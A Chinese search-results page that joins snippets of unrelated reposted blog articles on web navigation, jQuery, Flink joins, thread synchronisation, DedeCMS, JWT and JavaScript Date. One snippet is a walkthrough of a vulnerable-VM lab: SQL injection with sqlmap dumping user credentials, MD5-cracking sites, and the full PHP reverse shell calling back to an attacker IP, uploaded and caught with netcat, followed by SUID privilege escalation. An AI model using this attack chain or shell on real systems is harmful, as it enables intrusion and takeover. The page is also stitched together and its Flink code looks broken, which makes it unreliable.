[OPENSSL工具Windows安装与使...]的搜索结果

...全新的导航模式，提倡使用临时（暂时显示）和永久（固定显示）两种类型的下拉导航以适应不同的应用场景，并强调了动画过渡效果在提升用户体验上的重要作用。 因此，在实际项目中，除了掌握基本的HTML、CSS和JavaScript实现方式，还需密切关注行业动态，结合最新的设计规范与开发工具，持续优化下拉导航条的用户体验，使其在满足功能需求的同时，更能展现良好的可用性和美观性。

...，使得jQuery的使用场景逐渐减少。然而，对于仍需支持老旧浏览器的企业级项目或维护老系统而言，理解并掌握jQuery与IE8及以下版本浏览器的兼容性解决方案仍然具有极高的实用价值。 最近，微软已正式停止对Internet Explorer 11的支持，并鼓励用户转向Edge浏览器，这标志着一个时代的终结，也意味着开发者将不再需要过于关注这类老旧浏览器的兼容性问题。但对于一些大型企业内部系统或者特定行业应用（如银行、政府机构），由于用户设备更新换代较慢，可能仍存在大量运行旧版IE的终端，因此针对这些环境进行代码兼容性的优化工作依然必不可少。 此外，随着ECMAScript标准的持续演进，如今的JavaScript已经具备了丰富的内置函数和方法，比如数组的Array.prototype.includes、字符串的String.prototype.trim等，这些原生API在很大程度上替代了jQuery的部分功能，使得开发者在不依赖第三方库的情况下也能轻松应对各种浏览器兼容性问题。 总的来说，尽管jQuery在解决旧版浏览器兼容性方面曾经功不可没，但随着技术的发展和浏览器生态的变化，我们应逐步适应并采用更为现代化的开发工具和策略。同时，在过渡阶段，对于那些必须保持向后兼容性的项目，深入理解和运用文中所述的jQuery扩展方法和技巧，无疑能为项目的平稳运行提供有力保障。

...成为了一个非常重要的工具。它的最大亮点就是既能处理实时数据，又能应对批量数据，而且表现得超级高效、灵活又极具扩展性，就像一个随需应变、随时升级的超级数据处理器。嘿，你知道吗？动态表的JOIN操作可真是个了不得的功能。这玩意儿就像个超级小助手，能让我们轻轻松松地处理那些复杂得让人挠头的数据分析工作，让数据处理变得简单又便捷，真可谓是我们的好帮手啊！本文将会详细介绍如何在Flink中实现动态表JOIN操作。 二、什么是动态表JOIN？ 动态表JOIN是一种特殊类型的JOIN操作，它可以让我们更加灵活地处理动态数据流。跟老式的静态表格JOIN玩法不一样，动态表JOIN更酷炫，它能在运行时灵活应变。就像个聪明的小助手，会根据输入数据的实时变化自动调整JOIN操作的结果，给你最准确、最新的信息。这种灵活性使得动态表JOIN非常适合处理那些不断变化的数据流。 三、如何在Flink中实现动态表JOIN？ 要实现动态表JOIN，我们需要做以下几个步骤： 1. 创建两个动态表 首先，我们需要创建两个动态表，这两个表可以是任何类型的表，例如关系型表、序列文件表或者是Parquet文件表等。 2. 定义JOIN条件 接下来，我们需要定义JOIN条件，这个条件可以是任意的条件，只要它满足动态表JOIN的要求即可。一般情况下，我们常常会借助一些比较基础的条件来进行操作，就像是拿主键做个配对游戏，或者根据时间戳来个精准的时间比对什么的。 3. 使用JOIN操作 最后，我们可以使用Flink的JOIN操作来实现动态表JOIN。Flink提供了多种JOIN操作，例如Inner Join、Left Join、Right Join以及Full Join等。我们可以根据实际情况选择合适的JOIN操作。 四、代码示例 下面是一个使用Flink实现动态表JOIN的简单示例。在本次实例里，我们要用两个活灵活现的动态表格来演示JOIN操作，一个叫“users”，另一个叫“orders”。想象一下，这就像是把这两本会不断更新变化的花名册和订单簿对齐合并一样。 java // 创建两个动态表 DataStream users = ...; DataStream orders = ...; // 定义JOIN条件 MapFunction userToOrderKeyMapper = new MapFunction() { @Override public OrderKey map(User value) throws Exception { return new OrderKey(value.getId(), value.getCountry()); } }; DataStream orderKeys = users.map(userToOrderKeyMapper); // 使用JOIN操作 DataStream> joined = orders.join(orderKeys) .where(new KeySelector() { @Override public OrderKey getKey(OrderKey value) throws Exception { return value; } }) .equalTo(new KeySelector() { @Override public User getKey(User value) throws Exception { return value; } }) .window(TumblingEventTimeWindows.of(Time.minutes(5))) .apply(new ProcessWindowFunction, Tuple2, TimeWindow>() { @Override public void process(TimeWindow window, Context context, Iterable> values, Collector> out) throws Exception { int count = 0; for (Tuple2 value : values) { if (value.f1.getUserId() == value.f0.getId()) { count++; } } if (count > 1) { out.collect(new Tuple2<>(value.f0, value.f1)); } } }); 在这个示例中，我们首先创建了两个动态表users和orders。然后，我们捣鼓出了一个叫userToOrderKeyMapper的神奇小函数，它的任务就是把用户对象摇身一变，变成订单键对象。接着，我们使用这个映射函数将users表转换为orderKeys表。 接下来，我们使用JOIN操作将orders表和orderKeys表进行JOIN。在JOIN操作这个环节，我们搞了个挺实用的小玩意儿叫键选择器where，它就像是个挖掘工，专门从那个orders表格里头找出来每个订单的关键信息。我们也定义了一个键选择器equalTo，它从users表中提取出用户对象。

...BC….依次递推。 Windows（VC9下编译运行通过）： include <iostream>include <windows.h>include <process.h>using namespace std;define PRINT_TIMES 10// 考虑到可读性 多写几个handle// define THREAD_NUMS 3// 用于打印字符控制，有点类似循环链表struct sPrintControl{char cPrint;HANDLE hEventThis;HANDLE hEventNext;};// 按照顺序打印字符UINT WINAPI vPrintCharWithSeq(LPVOID p_psPrintControl){sPrintControl l_psPrintControl = static_cast<sPrintControl>(p_psPrintControl);char l_cChar = l_psPrintControl->cPrint;for (int i = 0; i < PRINT_TIMES; i++){// wait for printWaitForSingleObject(l_psPrintControl->hEventThis, INFINITE);cout<<"ThreadId:"<<GetCurrentThreadId()<<' '<<i<<l_cChar<<endl;// signal the next threadSetEvent(l_psPrintControl->hEventNext);}return 0;}int main(){HANDLE l_hThreadA = NULL;HANDLE l_hThreadB = NULL;HANDLE l_hThreadC = NULL;HANDLE l_hThreadAEvent = NULL;HANDLE l_hThreadBEvent = NULL;HANDLE l_hThreadCEvent = NULL;// 自动重置，从ThreadA开始打印l_hThreadAEvent = CreateEvent(NULL, FALSE, TRUE, NULL);l_hThreadBEvent = CreateEvent(NULL, FALSE, FALSE, NULL);l_hThreadCEvent = CreateEvent(NULL, FALSE, FALSE, NULL);sPrintControl l_sPrintControl[3] = { {'A', l_hThreadAEvent, l_hThreadBEvent}, {'B', l_hThreadBEvent, l_hThreadCEvent}, {'C', l_hThreadCEvent, l_hThreadAEvent} };l_hThreadA = (HANDLE)_beginthreadex(NULL, 0, vPrintCharWithSeq, &l_sPrintControl[0], THREAD_PRIORITY_NORMAL, NULL);l_hThreadB = (HANDLE)_beginthreadex(NULL, 0, vPrintCharWithSeq, &l_sPrintControl[1], THREAD_PRIORITY_NORMAL, NULL);l_hThreadC = (HANDLE)_beginthreadex(NULL, 0, vPrintCharWithSeq, &l_sPrintControl[2], THREAD_PRIORITY_NORMAL, NULL);// 等待线程结束WaitForSingleObject(l_hThreadA, INFINITE);WaitForSingleObject(l_hThreadB, INFINITE);WaitForSingleObject(l_hThreadC, INFINITE);// 释放CloseHandle(l_hThreadA);CloseHandle(l_hThreadB);CloseHandle(l_hThreadC);CloseHandle(l_hThreadAEvent);CloseHandle(l_hThreadBEvent);CloseHandle(l_hThreadCEvent);return 0;} Linux： 感谢Jinhao的帮助。用pthread_cond_t解决了。实际上测试用sem_t还快一点。因为用sem_t的方法类似windows下面用Event就不贴代码了。 线程关键代码： void thread(thr_id t){pthread_mutex_lock(t->mutex); //这个lock相当重要sem_post(t->sem);pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);//真正开始for(int i = 0; i < 10; ++i){pthread_mutex_lock(t->mutex);std::cout<<t->id<<std::flush;pthread_cond_signal(t->next_cond);if(i < 9) //输出最后一遍的时候,不用再wait而是退出线程pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);} } Jinhao：现在C唤醒A的时候,能保证A是wait的状态.因为A在cond_wait的时候,B才能获得锁,当b在cond_wait的时候,C才获得锁.所以当C cond_signal A时, A必然是cond_wait的。 全部代码如下： include <iostream>include <stdlib.h>include <pthread.h>include <stdio.h>include <semaphore.h>using namespace std;struct thr_id{char id;sem_t sem;pthread_mutex_t mutex;pthread_cond_t self_cond;pthread_cond_t next_cond;};void thread(thr_id t){pthread_mutex_lock(t->mutex);sem_post(t->sem);pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);for(int i = 0; i < 10000; ++i){pthread_mutex_lock(t->mutex);std::cout<<t->id<<std::flush;pthread_cond_signal(t->next_cond);if(i < 9999)pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);} }typedef void (PRINTTHREADFUNC) (void);int main(){pthread_t th_a, th_b, th_c;sem_t sem;sem_init(&sem, 0, 0);pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;pthread_cond_t cond_a = PTHREAD_COND_INITIALIZER;pthread_cond_t cond_b = PTHREAD_COND_INITIALIZER;pthread_cond_t cond_c = PTHREAD_COND_INITIALIZER;thr_id thrids[3] = { {'a', &sem, &mutex, &cond_a, &cond_b},{'b', &sem, &mutex, &cond_b, &cond_c},{'c', &sem, &mutex, &cond_c, &cond_a} };pthread_create(&th_a, NULL, reinterpret_cast<PRINTTHREADFUNC>(thread), &thrids[0]);pthread_create(&th_b, NULL, reinterpret_cast<PRINTTHREADFUNC>(thread), &thrids[1]);pthread_create(&th_c, NULL, reinterpret_cast<PRINTTHREADFUNC>(thread), &thrids[2]);for(int i = 0; i < 3; ++i){sem_wait(&sem);}pthread_mutex_lock(&mutex);pthread_cond_signal(thrids[0].self_cond);pthread_mutex_unlock(&mutex);pthread_join(th_a, NULL);pthread_join(th_b, NULL);pthread_join(th_c, NULL);sem_destroy(&sem);pthread_cond_destroy(&cond_a);pthread_cond_destroy(&cond_b);pthread_cond_destroy(&cond_c);return 0;} 本篇文章为转载内容。原文链接：https://blog.csdn.net/enjolras/article/details/7456540。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...b Tokens）的使用得到了越来越多的关注。JWT不仅能够简化身份验证流程，还能提高系统的安全性。此外，一些开源库如express-jwt和jsonwebtoken，为开发者提供了便捷的工具来处理JWT相关的操作，从而减少因不当实现而导致的安全风险。 另外，随着微服务架构的普及，跨域资源共享（CORS）成为另一个需要关注的领域。确保正确配置CORS策略对于防止未授权访问至关重要。例如，最近Netflix公开分享了其在构建大规模微服务架构时如何处理CORS的最佳实践，其中包括详细的配置指南和常见陷阱的避免方法。 最后，持续集成/持续部署（CI/CD）流水线中的自动化安全检查也变得越来越重要。通过将安全扫描工具集成到CI/CD流程中，可以及早发现并修复潜在的安全漏洞。例如，GitHub Actions和GitLab CI等平台提供了丰富的插件和模板，帮助开发者轻松实现这一目标。 总之，通过采用最新的安全技术和最佳实践，我们可以显著提升Vue项目以及其他Web应用的安全性，从而为用户提供更加可靠的服务。

...的领先品牌，目前程序安装量已达七十万，超过六成的站点正在使用织梦CMS或基于织梦CMS核心开发。 织梦Dede CMS功能特点： 良好的用户口碑，丰富的开源经验 灵活的模块组合，让网站更丰富 简单易用的模板引擎，网站界面想换就换 便捷自定义模型 高效的动态静态页面部署 流畅专业界面设计，良好的用户体验 指纹验证，升级无忧 低维护成本 国际语言支持 会员互动，让您的网站火起来 DedeCMS 产品使用说明 一、平台需求 1.Windows 平台： IIS/Apache/Nginx + PHP4/PHP5.2+/PHP5.3+ + MySQL4/5 如果在windows环境中使用，建议用DedeCMS提供的DedeAMPZ套件以达到最佳使用性能。 2.Linux/Unix 平台 Apache + PHP4/PHP5 + MySQL3/4/5 (PHP必须在非安全模式下运行) 建议使用平台：Linux + Apache2.2 + PHP5.2/PHP5.3 + MySQL5.0 3.PHP必须环境或启用的系统函数： allow_url_fopen GD扩展库 MySQL扩展库 系统函数 —— phpinfo、dir 4.基本目录结构 / ..../install 安装程序目录，安装完后可删除[安装时必须有可写入权限] ..../dede 默认后台管理目录(可任意改名) ..../include 类库文件目录 ..../plus 附助程序目录 ..../member 会员目录 ..../images 系统默认模板图片存放目录 ..../uploads 默认上传目录[必须可写入] ..../a 默认HTML文件存放目录[必须可写入] ..../templets 系统默认内核模板目录 ..../data 系统缓存或其它可写入数据存放目录[必须可写入] ..../special 专题目录[生成一次专题后可以删除special/index.php，必须可写入] 5.PHP环境容易碰到的不兼容性问题 (1)data目录没写入权限，导致系统session无法使用，这将导致无法登录管理后台(直接表现为验证码不能正常显示)； (2)php的上传的临时文件夹没设置好或没写入权限，这会导致文件上传的功能无法使用； (3)出现莫名的错误，如安装时显示空白，这样能是由于系统没装载mysql扩展导致的，对于初级用户，可以下载dede的php套件包，以方便简单的使用。 二、程序安装使用 1.下载程序解压到本地目录; 2.上传程序目录中的/uploads到网站根目录 3.运行http://www.yourname.com/install/index.php(yourname表示你的域名),按照安装提速说明进行程序安装 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_31879641/article/details/115616068。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

在深入理解了如何使用JavaScript实现网页浏览历史记录功能后，我们可以进一步探讨该技术在当前互联网环境下的应用与发展。近年来，随着用户隐私保护意识的增强和GDPR等法规的出台，浏览器对Cookie的限制日益严格，这对依赖Cookie记录用户行为的功能提出了新的挑战。 例如，2021年苹果公司在iOS 14.5系统中引入了ATT（App Tracking Transparency）框架，要求应用在跟踪用户数据前必须征得用户的明确同意，这一变化直接影响到网站和应用对用户浏览历史记录的收集方式。因此，开发者正在寻找替代方案，如使用IndexedDB进行本地存储或者采用Server-side session管理等技术手段。 此外，对于JavaScript追踪用户点击行为的方式也在不断优化。现代前端框架如React、Vue等提供了更强大的状态管理和事件处理机制，可以帮助开发者更高效地实现用户交互行为的记录与分析。同时，Google Analytics 4等先进的分析工具已经实现了无Cookie的用户行为追踪，并能够提供更为详尽且合规的用户行为洞察报告。 综上所述，在确保用户隐私的前提下，运用JavaScript实现在不同场景下的浏览历史记录是一项与时俱进的技术实践。开发者不仅需要关注最新的编程技术和规范，同时也需紧跟行业发展趋势及法律法规要求，以实现用户体验与数据安全之间的平衡。

...查看靶机开放的端口 使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口 可以发现有 2 个端口开放，22 和 80 2.1.3 尝试访问靶机网页 2.2枚举漏洞 22 端口分析 一般只能暴力破解，暂时没有合适的字典 80 端口分析 访问网站， 发现是一个登陆页面 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Nm2jCq05-1650016495541)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110170424128.png)] 成功登录后 尝试手工注入：x' or 1=1 成功返回所有信息，说明存在SQL注入 2.3漏洞利用 2.3.1 sqlmap 利用注入漏洞 使用 burp 抓查询数据包 POST /welcome.php HTTP/1.1Host: 192.168.184.149Content-Length: 23Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://192.168.184.149Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://192.168.184.149/welcome.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=jub1jihglt85brngo5imqsifb3Connection: closesearch=x 将数据包保存为文件 hackme1.txt 使用 sqlmap 跑一下测试漏洞并获取数据库名： 🚀 python sqlmap.py -r hackme1.txt --dbs --batch [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DjhXfuV9-1650016495544)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110171527015.png)] 数据库除了基础数据库有webapphacking 接下来咱们获取一下表名 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking --tables [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mzxiwhu-1650016495544)(C:\Users\zhang\AppData\Roaming\Typora\typora-user-images\image-20220110172336353.png)] 可以得到两个表books和users 咱们先获取一下users表的信息 🚀 python sqlmap.py -r hackme1.txt --batch -D webapphacking -T users --dump --batch 可以看到有一个superadmin，超级管理员，看起来像一个md5 扩展 在线解密md5网站 国内MD5解密： http://t007.cn/ https://cmd5.la/ https://cmd5.com/ https://pmd5.com/ http://ttmd5.com/ https://md5.navisec.it/ http://md5.tellyou.top/ https://www.somd5.com/ http://www.chamd5.org/ 国外MD5解密： https://www.md5tr.com/ http://md5.my-addr.com/ https://md5.gromweb.com/ https://www.md5decrypt.org/ https://md5decrypt.net/en/ https://md5hashing.net/hash/md5/ https://hashes.com/en/decrypt/hash https://www.whatsmyip.org/hash-lookup/ https://www.md5online.org/md5-decrypt.html https://md5-passwort.de/md5-passwort-suchen 解出来密码是：Uncrackable 登录上去，发现有上传功能 2.3.2 文件上传漏洞 getshell 将 kali 自带的 php-reverse-shell.php 复制一份到 查看文件内容，并修改IP地址 <?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 pentestmonkey@pentestmonkey.net//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. The author accepts no liability// for damage caused by this tool. If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only. Users take full responsibility// for any actions performed using this tool. If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at pentestmonkey@pentestmonkey.net//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.set_time_limit (0);$VERSION = "1.0";$ip = '192.168.184.128'; // CHANGE THIS$port = 6666; // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0); // Parent exits}// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec = array(0 => array("pipe", "r"), // stdin is a pipe that the child will read from1 => array("pipe", "w"), // stdout is a pipe that the child will write to2 => array("pipe", "w") // stderr is a pipe that the child will write to);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break;}// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);} }fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {if (!$daemon) {print "$string\n";} }?> [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RhgS5l2a-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173559344.png)] 上传该文件 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CKEldpll-1650016495549)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110173801442.png)] 在 kali 监听：nc -lvp 6666 访问后门文件：http://192.168.184.149/php-reverse-shell.php 不成功 尝试加上传文件夹：http://192.168.184.149/uploads/php-reverse-shell.php 成功访问 使用 python 切换为 bash：python3 -c 'import pty; pty.spawn("/bin/bash")' 2.4权限提升 2.4.1 SUID 提权 sudo -l不顶用了，换个方法 查询 suid 权限程序: find / -perm -u=s -type f 2>/dev/null www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/snap/core20/1270/usr/bin/chfn/snap/core20/1270/usr/bin/chsh/snap/core20/1270/usr/bin/gpasswd/snap/core20/1270/usr/bin/mount/snap/core20/1270/usr/bin/newgrp/snap/core20/1270/usr/bin/passwd/snap/core20/1270/usr/bin/su/snap/core20/1270/usr/bin/sudo/snap/core20/1270/usr/bin/umount/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core20/1270/usr/lib/openssh/ssh-keysign/snap/core/6531/bin/mount/snap/core/6531/bin/ping/snap/core/6531/bin/ping6/snap/core/6531/bin/su/snap/core/6531/bin/umount/snap/core/6531/usr/bin/chfn/snap/core/6531/usr/bin/chsh/snap/core/6531/usr/bin/gpasswd/snap/core/6531/usr/bin/newgrp/snap/core/6531/usr/bin/passwd/snap/core/6531/usr/bin/sudo/snap/core/6531/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6531/usr/lib/openssh/ssh-keysign/snap/core/6531/usr/lib/snapd/snap-confine/snap/core/6531/usr/sbin/pppd/snap/core/5662/bin/mount/snap/core/5662/bin/ping/snap/core/5662/bin/ping6/snap/core/5662/bin/su/snap/core/5662/bin/umount/snap/core/5662/usr/bin/chfn/snap/core/5662/usr/bin/chsh/snap/core/5662/usr/bin/gpasswd/snap/core/5662/usr/bin/newgrp/snap/core/5662/usr/bin/passwd/snap/core/5662/usr/bin/sudo/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/5662/usr/lib/openssh/ssh-keysign/snap/core/5662/usr/lib/snapd/snap-confine/snap/core/5662/usr/sbin/pppd/snap/core/11993/bin/mount/snap/core/11993/bin/ping/snap/core/11993/bin/ping6/snap/core/11993/bin/su/snap/core/11993/bin/umount/snap/core/11993/usr/bin/chfn/snap/core/11993/usr/bin/chsh/snap/core/11993/usr/bin/gpasswd/snap/core/11993/usr/bin/newgrp/snap/core/11993/usr/bin/passwd/snap/core/11993/usr/bin/sudo/snap/core/11993/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/11993/usr/lib/openssh/ssh-keysign/snap/core/11993/usr/lib/snapd/snap-confine/snap/core/11993/usr/sbin/pppd/usr/lib/eject/dmcrypt-get-device/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/bin/pkexec/usr/bin/traceroute6.iputils/usr/bin/passwd/usr/bin/chsh/usr/bin/chfn/usr/bin/gpasswd/usr/bin/at/usr/bin/newgrp/usr/bin/sudo/home/legacy/touchmenot/bin/mount/bin/umount/bin/ping/bin/ntfs-3g/bin/su/bin/fusermount 发现一个可疑文件/home/legacy/touchmenot 在 https://gtfobins.github.io/网站上查询：touchmenot 没找到 尝试运行程序：发现直接提权成功 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qcpXI6zZ-1650016495551)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220110174530827.png)] 找半天没找到flag的文件 what?就这？ 总结 本节使用的工具和漏洞比较基础，涉及 SQL 注入漏洞和文件上传漏洞 sql 注入工具：sqlmap 抓包工具：burpsuite Webshell 后门：kali 内置后门 Suid 提权：touchmenot 提权 本篇文章为转载内容。原文链接：https://blog.csdn.net/Perpetual_Blue/article/details/124200651。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...为此，Date 类型使用 UTC（Coordinated Universal Time，国际协调时间[又称世界统一时间]）1970 年 1 月 1 日午夜（零时）开始经过的毫秒来保存日期。在使用这种数据存储格式的条件下，Date 类型保存的日期能够精确到 1970 年 1 月 1 日之前或之后的 285616 年。 创建一个日期对象，使用 new 运算符和 Date 构造方法（构造函数）即可。 var box = new Date(); // 创建一个日期对象 在调用 Date 构造方法而不传递参数的情况下，新建的对象自动获取当前的时间和日期。 alert(box); // 不同浏览器显示不同 ECMAScript 提供了两个方法，Date.parse()和 Date.UTC()。Date.parse()方法接收一个表示日期的字符串参数，然后尝试根据这个字符串返回相应的毫秒数。ECMA-262 没有定义 Date.parse()应该支持哪种日期格式，因此方法的行为因实现而异，因地区而异。默认通常接收的日期格式如下： ‘月/日/年’，如 6/13/2011; ‘英文月名 日, 年’，如 May 25, 2004; ‘英文星期几 英文月名 日 年 时:分:秒 时区’，如 Tue May 25 2004 00:00:00 GMT-070 alert(Date.parse('6/13/2011')); // 1307894400000 如果 Date.parse()没有传入或者不是标准的日期格式，那么就会返回 NaN。 alert(Date.parse()); // NaN 如果想输出指定的日期，那么把 Date.parse()传入 Date 构造方法里。 var box = new Date(Date.parse('6/13/2011')); // Mon Jun 13 2011 00:00:00 GMT+0800var box = new Date('6/13/2011'); // 直接传入，Date.parse()后台被调用 Date 对象及其在不同浏览器中的实现有许多奇怪的行为。其中有一种倾向是将超出的范围的值替换成当前的值，以便生成输出。例如，在解析“January 32, 2007”时，有的浏览器会将其解释为“February 1, 2007”。而 Opera 则倾向与插入当前月份的当前日期。 Date.UTC()方法同样也返回表示日期的毫秒数，但它与 Date.parse()在构建值时使用不同的信息。（年份，基于 0 的月份[0 表示 1 月，1 表示 2 月]，月中的哪一天[1-31]，小时数[0-23] ，分钟，秒以及毫秒)。只有前两个参数是必须的。如果没有提供月数，则天数为 1；如果省略其他参数，则统统为 0。 alert(Date.UTC(2011,11)); // 1322697600000 如果 Date.UTC()参数传递错误，那么就会出现负值或者 NaN 等非法信息。 alert(Date.UTC()); // 负值或者 NaN 如果要输出指定日期，那么直接把 Date.UTC()传入 Date 构造方法里即可。 var box = new Date(Date.UTC(2011,11, 5, 15, 13, 16)); 通用的方法 与其他类型一样，Date 类型也重写了 toLocaleString()、toString()和 valueOf()方法；但这些方法返回值与其他类型中的方法不同。 var box = new Date(Date.UTC(2011,11, 5, 15, 13, 16));alert('toString:' + box.toString());alert('toLocaleString:' + box.toLocaleString()); // 按本地格式输出 这两个方法在不同浏览器显示的效果又不一样，但不用担心，这两个方法只是在调试比较有用，在显示时间和日期上，没什么价值。valueOf()方法显示毫秒数。 日期格式化方法 Date 类型还有一些专门用于将日期格式化为字符串的方法。 var box = new Date();alert(box.toDateString()); // 以特定的格式显示星期几、月、日和年alert(box.toTimeString()); // 以特定的格式显示时、分、秒和时区alert(box.toLocaleDateString()); // 以特定地区格式显示星期几、月、日和年alert(box.toLocaleTimeString()); // 以特定地区格式显示时、分、秒和时区alert(box.toUTCString()); // 以特定的格式显示完整的 UTC 日期 组件方法 组件方法，是为我们单独获取你想要的各种时间/日期而提供的方法。需要注意的时候 ，这些方法中，有带 UTC 的，有不带 UTC 的。UTC 日期指的是在没有时区偏差的情况下的日期值。 alert(box.getTime()); // 获取日期的毫秒数，和 valueOf()返回一致alert(box.setTime(100)); // 以毫秒数设置日期，会改变整个日期alert(box.getFullYear()); // 获取四位年份alert(box.setFullYear(2012)); // 设置四位年份，返回的是毫秒数alert(box.getMonth()); // 获取月份，没指定月份，从 0 开始算起alert(box.setMonth(11)); // 设置月份alert(box.getDate()); // 获取日期alert(box.setDate(8)); // 设置日期，返回毫秒数alert(box.getDay()); // 返回星期几，0 表示星期日，6 表示星期六alert(box.setDay(2)); // 设置星期几alert(box.getHours()); // 返回时alert(box.setHours(12)); // 设置时alert(box.getMinutes()); // 返回分钟alert(box.setMinutes(22)); // 设置分钟alert(box.getSeconds()); // 返回秒数alert(box.setSeconds(44)); // 